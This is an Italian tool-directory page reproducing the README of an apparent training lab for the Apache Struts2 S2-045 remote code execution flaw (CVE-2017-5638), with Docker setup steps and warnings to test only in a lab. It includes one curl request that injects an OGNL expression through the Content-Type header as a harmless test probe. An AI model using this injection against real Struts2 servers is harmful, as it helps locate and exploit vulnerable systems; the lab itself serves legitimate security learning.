Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
vulhub-struts2 — Un laboratorio pratico che dimostra lo sfruttamento di una vulnerabilità critica di Remote Code Execution (RCE) in Apache Struts2 (CVE-2017-5638) utilizzando ambienti Docker Vulhub. Include istruzioni di configurazione e comandi per eseguire il contenitore vulnerabile. | Kitploit
Strumenti/GitHubGitHub/soufiane-benchahyd/vulhub-struts2
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubsoufiane-benchahyd/vulhub-struts2

vulhub-struts2

Un laboratorio pratico che dimostra lo sfruttamento di una vulnerabilità critica di Remote Code Execution (RCE) in Apache Struts2 (CVE-2017-5638) utilizzando ambienti Docker Vulhub. Include istruzioni di configurazione e comandi per eseguire il contenitore vulnerabile.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
6 mesi faNon ancora revisionato

Apache Struts2 S2-045 RCE (CVE-2017-5638)

📌 Panoramica

Questo progetto dimostra la vulnerabilità di Remote Code Execution (RCE) in Apache Struts2 (CVE-2017-5638).

Gli attaccanti possono sfruttare un'intestazione HTTP Content-Type appositamente modificata per eseguire comandi di sistema arbitrari su server vulnerabili.

Questo repository utilizza i laboratori Vulhub Docker per fornire un ambiente sicuro per testare e comprendere la vulnerabilità.


🛠 Configurazione dell'ambiente

  • Host: Ubuntu 24.04 (VirtualBox o Nativo)
  • Docker e Docker Compose
  • Laboratorio Vulhub
  • Versione Apache Struts2: 2.3.30

🚀 Per Iniziare

1️⃣ Clona questo repository

root@kitploit:~
git clone https://github.com/soufiane-benchahyd/vulhub-struts2.git
cd vulhub-struts2/struts2/s2-045

2️⃣ Avvia il contenitore vulnerabile

root@kitploit:~
docker compose up -d

3️⃣ Verifica che il contenitore sia in esecuzione

root@kitploit:~
docker ps

Dovresti vedere qualcosa del tipo:

root@kitploit:~
CONTAINER ID   IMAGE                   COMMAND                  STATUS      PORTS
xxxxxxx        vulhub/struts2:2.3.30   "/usr/local/bin/mvn-…"   Up          0.0.0.0:8080->8080/tcp

4️⃣ Testa l'interfaccia web

Apri il browser → http://<VM_IP>:8080 Dovresti vedere la homepage dell'applicazione Struts2.

Esempio IP VM: 192.168.56.101


💻 Sfruttamento

⚠️ Esegui lo sfruttamento solo in un ambiente di laboratorio controllato. Non attaccare mai server pubblici.

Ora puoi testare la RCE utilizzando script o strumenti come curl o Metasploit contro il contenitore vulnerabile.

Esempio (sostituisci <comando> con il tuo comando di test):

root@kitploit:~
curl -v -H "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','test')}" http://<VM_IP>:8080/

📝 Note

  • Questo laboratorio è sicuro: tutte le azioni avvengono all'interno di Docker.
  • Screenshot del tuo test possono essere aggiunti successivamente su GitHub.
  • Puoi estendere questo repository con altre vulnerabilità Struts2 per un portfolio di apprendimento completo.

⚡ Riferimenti

  • Apache Struts2 S2-045 CVE
  • Vulhub GitHub
Scarica lo strumento